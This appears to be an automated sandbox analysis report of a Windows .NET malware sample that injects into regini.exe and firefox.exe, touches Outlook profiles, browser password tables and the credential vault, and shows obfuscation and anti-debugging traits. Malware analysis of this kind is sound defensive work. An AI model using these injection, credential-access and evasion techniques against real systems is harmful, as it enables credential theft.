                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                Source: regini.exe, 00000007.00000002.3752723389.0000000002631000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3752723389.0000000002606000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3752723389.0000000002655000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1689456035.0000000002627000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3752723389.0000000002627000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
                Source: file.exeReversingLabs: Detection: 68%
                Source: file.exeVirustotal: Detection: 37%
                Source: file.exeString found in binary or memory: -Add*+
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QmkRHPDwxbW.exe, 00000005.00000002.3753745790.0000000000C4E000.00000002.00000001.01000000.0000000C.sdmp, QmkRHPDwxbW.exe, 00000008.00000002.3750502958.0000000000C4E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: file.exe, 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1502123475.00000000027B4000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1504791007.0000000002962000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000007.00000003.1502123475.00000000027B4000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1504791007.0000000002962000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: file.exe, 00000004.00000002.1501327287.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754091427.0000000000D68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: file.exe, 00000004.00000002.1501327287.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754091427.0000000000D68000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: file.exe, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, iHVIqRWtieGe6IZObc.cs.Net Code: SC36JhK84M System.Reflection.Assembly.Load(byte[])
                Source: 1.2.file.exe.7400000.4.raw.unpack, iHVIqRWtieGe6IZObc.cs.Net Code: SC36JhK84M System.Reflection.Assembly.Load(byte[])
                Source: 7.2.regini.exe.322cd14.2.raw.unpack, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 8.2.QmkRHPDwxbW.exe.33dcd14.1.raw.unpack, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 8.0.QmkRHPDwxbW.exe.33dcd14.1.raw.unpack, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 10.2.firefox.exe.2b8acd14.0.raw.unpack, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_02660434 push ecx; ret 1_2_02660442
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0266DB84 pushfd ; ret 1_2_0266DB89
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040D066 push cs; retf 4_2_0040D068
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00416123 push ecx; iretd 4_2_00416145
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0041692E push eax; ret 4_2_00416930
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004031F0 push eax; ret 4_2_004031F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040D192 push 32D5BE83h; retf 4_2_0040D19A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004082F0 push cs; ret 4_2_004082FD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004192F0 pushad ; retf 4_2_004192F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040D3DF push edx; retf 4_2_0040D3E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A09AD push ecx; mov dword ptr [esp], ecx4_2_017A09B6
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034E9886 push edx; retf 5_2_034E9888
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034F5797 pushad ; retf 5_2_034F5799
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034E9639 push 32D5BE83h; retf 5_2_034E9641
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034E950D push cs; retf 5_2_034E950F
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034F25CA push ecx; iretd 5_2_034F25EC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034F25C7 push ecx; iretd 5_2_034F25EC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034F2DD5 push eax; ret 5_2_034F2DD7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B409AD push ecx; mov dword ptr [esp], ecx7_2_02B409B6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024160FD pushad ; retf 7_2_024160FF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024206C7 push edx; iretd 7_2_024206C8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024206EF push ebp; ret 7_2_024206FB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02412F30 push ecx; iretd 7_2_02412F52
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024050FD push cs; ret 7_2_0240510A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0241373B push eax; ret 7_2_0241373D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6C263 push edi; retf 7_2_02E6C265
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6F1FA push 17DCBDD3h; retf 7_2_02E6F1FF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6F64E push 48B9A3D6h; iretd 7_2_02E6F653
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E664AB push ds; ret 7_2_02E66549
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E664B8 push ds; ret 7_2_02E66549
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6654A push ds; ret 7_2_02E66549
                Source: file.exeStatic PE information: section name: .text entropy: 7.558811288088065
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, 1.2.file.exe.7400000.4.raw.unpack: High entropy of concatenated method names
                Source: 1.2.file.exe.7400000.4.raw.unpack, KNWZAykLBUvM1DiVJn.csHigh entropy of concatenated method names: 'CajixT8if1', 'LJQicIeuD6', 'kbJiFRBSWZ', 'msUiAj9Wss', 'N6hi3kWGOv', 'JpaiITU0ID', 'YHOiRP5QIk', 'MXkiBMP5pi', 'lixisNX0ss', 'oDXi8O5FKU'
                Source: 1.2.file.exe.7400000.4.raw.unpack, UsXdQMRyGh14DOSdJh.csHigh entropy of concatenated method names: 'nCp7ComnB9', 'JTB7DPQsFF', 'Xuh7HNj804', 'I9IHbyuexk', 'pt3Hzq04He', 'y6j72GVVp8', 'Bdh7Xa5PVr', 'aly7M5F4fx', 'Bwy7jSuOE2', 'LWM76ifGri'
                Source: 1.2.file.exe.7400000.4.raw.unpack, hxopGhukMLFbhcLudZ.csHigh entropy of concatenated method names: 'ToString', 'XFoU86Q6ZV', 'gK9UAosgn0', 'H3YUKSQCpo', 'vc5U3mMUKf', 'P3pUIRleVh', 'DnsUSCSkaD', 'Hi8URKNQ2K', 'SOhUBrpPAQ', 'MY6UOT7kFo'
                Source: 1.2.file.exe.7400000.4.raw.unpack, iHVIqRWtieGe6IZObc.csHigh entropy of concatenated method names: 'OYujrykgRZ', 'NfkjCHvDou', 'QV9j4haGJv', 'WIIjDpL3kR', 'Onfj9lo7WK', 'b86jHqH9qD', 'CbQj7TRfW2', 'LTZjW2eQHm', 'egvjNqL7uX', 'tOqjGWJ54n'
                Source: 1.2.file.exe.7400000.4.raw.unpack, te1q2qAt5nMxrSFyUj.csHigh entropy of concatenated method names: 'eVcrKWT8vpqLYm6Di9g', 'OdlfgMTN6CvHi3tcoAF', 'VmX8S2TZwLRWYHbUIU2', 'gArHhOXetK', 'QpCHYivnQp', 'UQ0HdmJPLT', 'TBonwZTj10lSCRj9LQV', 'XLkG9GTbIlZY6q49vMc'
                Source: 1.2.file.exe.7400000.4.raw.unpack, iH1ojhzvhAIrnrVGKs.csHigh entropy of concatenated method names: 'g20daBF4dj', 'nIwdxe9Ivw', 'T0Cdcd28Gy', 'DfqdFrpira', 'ewLdANLXV7', 'BoHd3jUXvF', 'a3cdI7saa3', 'Wvjdv1EIKt', 'NYmdlMQHU0', 'ilhdoZ3CSn'
                Source: 1.2.file.exe.7400000.4.raw.unpack, i3U78VtUiIx3AXibNC.csHigh entropy of concatenated method names: 'qu9pG11rWQ', 'yYZpe5qnOl', 'ToString', 'tB6pC3Xo9n', 'wqKp4ROCiU', 'tdVpDJQTQM', 'oeMp99cVqJ', 'wYkpHnJxmJ', 'djip7Avf9b', 'cR0pWyRmji'
                Source: 1.2.file.exe.7400000.4.raw.unpack, xqx5ZfOUTHmOmAqYKE.csHigh entropy of concatenated method names: 'oss7lpqqtd', 'PAO7o1gRk0', 'vhT7JUeaRh', 'ddF7V9KCNg', 'ytK7Z0Ftc3', 'vH67arqA8M', 'Vah7qJbqZF', 'XuM7x7Ky5I', 'FYq7crBKNe', 'uYX7Tfu6Vw'
                Source: 1.2.file.exe.7400000.4.raw.unpack, Gp9DEHTFCEIvunMulj.csHigh entropy of concatenated method names: 'zOY9ZsiIG0', 'NcW9qoEV4s', 'pLQDK781KJ', 'YA3D3oHWxT', 'juFDIMsVqL', 'DUnDS359i7', 'rJDDRbtPQM', 'GUqDB19yT3', 'LWqDOXhiXF', 'k97DshggQJ'
                Source: 1.2.file.exe.7400000.4.raw.unpack, ES1iiGFPOEgdtc4tH1.csHigh entropy of concatenated method names: 'emnHrgOxs3', 'Is9H4j3CvT', 'zkgH9v9JoJ', 'ut6H7BORh1', 'Qp2HWW7ufX', 'ztf95YTdxx', 'qap9n8o2Dy', 'gqU9fufnDJ', 'qlT9yEfDiZ', 'yXG9LPvS2Z'
                Source: 1.2.file.exe.7400000.4.raw.unpack, AFLxX1X2yYq2USp3C44.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KODd8ra2ul', 'i0udwWbEWt', 'Tb6dkiDgVH', 'SZwdPiIW7d', 'GIgd1axmo5', 'Og1duaOyGL', 'Hn4dtntDbQ'
                Source: 1.2.file.exe.7400000.4.raw.unpack, IRLeuM44RxmjYC3sAi.csHigh entropy of concatenated method names: 'Dispose', 'c3TXLwYiKO', 'KJRMAOaQ3D', 'rcQBX4xq4T', 'mDDXbAQAxB', 'qPhXzi4uhP', 'ProcessDialogKey', 'YcxM2Rj7dk', 'TqlMXvEstN', 'mrMMMC0aAj'
                Source: 1.2.file.exe.7400000.4.raw.unpack, f0aAj2bMEmUckslppK.csHigh entropy of concatenated method names: 'Dv3dDgcLOb', 'nEsd9vumrT', 'q2DdH7YTlh', 'C0od7bUjih', 'cxwdYBZZp2', 'QoXdWbeDEG', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.file.exe.7400000.4.raw.unpack, tACKsBfW2M3TwYiKOG.csHigh entropy of concatenated method names: 'EFPYQyVWo5', 'gQBYpM2wQy', 'me9YYYojEL', 'XPVYg0AgHc', 'sDGYEQws71', 'RH9YvnVxZn', 'Dispose', 'ioghCIL8wZ', 'E5eh4JEAMi', 'iCVhDNWMew'
                Source: 1.2.file.exe.7400000.4.raw.unpack, CgAGU9M9tWWICRj7qZ.csHigh entropy of concatenated method names: 'mU0J07Sp8', 'uK3VMycR7', 'sjaaAJj9R', 'TDUqtsUdM', 'pw2ckUjQR', 'OUJTneXQj', 'U5UyS2wghSeIbnFn38', 'HLJhNm7Gm2jjTxaCJ3', 'qDXhTedxq', 'rA5dMbtaM'
                Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\regini.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match, File source: Process Memory Space: file.exe PID: 8004, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Users\user\Desktop\file.exe Memory allocated: CC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe Memory allocated: 26E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe Memory allocated: 7590000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe Memory allocated: 8590000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe Memory allocated: 8740000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe Memory allocated: 9740000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe Code function: 4_2_017E096E rdtsc
                Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\regini.exe Window / User API: threadDelayed 2572
                Source: C:\Windows\SysWOW64\regini.exe Window / User API: threadDelayed 7401
                Source: C:\Users\user\Desktop\file.exe API coverage: 0.8 %
                Source: C:\Windows\SysWOW64\regini.exe API coverage: 2.7 %
                Source: C:\Users\user\Desktop\file.exe TID: 8024 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe TID: 6032 Thread sleep count: 2572 > 30
                Source: C:\Windows\SysWOW64\regini.exe TID: 6032 Thread sleep time: -5144000s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe TID: 6032 Thread sleep count: 7401 > 30
                Source: C:\Windows\SysWOW64\regini.exe TID: 6032 Thread sleep time: -14802000s >= -30000s
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe TID: 6364 Thread sleep time: -60000s >= -30000s
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe TID: 6364 Thread sleep count: 34 > 30
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe TID: 6364 Thread sleep time: -51000s >= -30000s
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe TID: 6364 Thread sleep count: 35 > 30
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe TID: 6364 Thread sleep time: -35000s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_0241C8D0 FindFirstFileW, FindNextFileW, FindClose
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\regini.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 4_2_017E096E rdtsc
                Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00417A73 LdrLoadDll
                Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01844180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
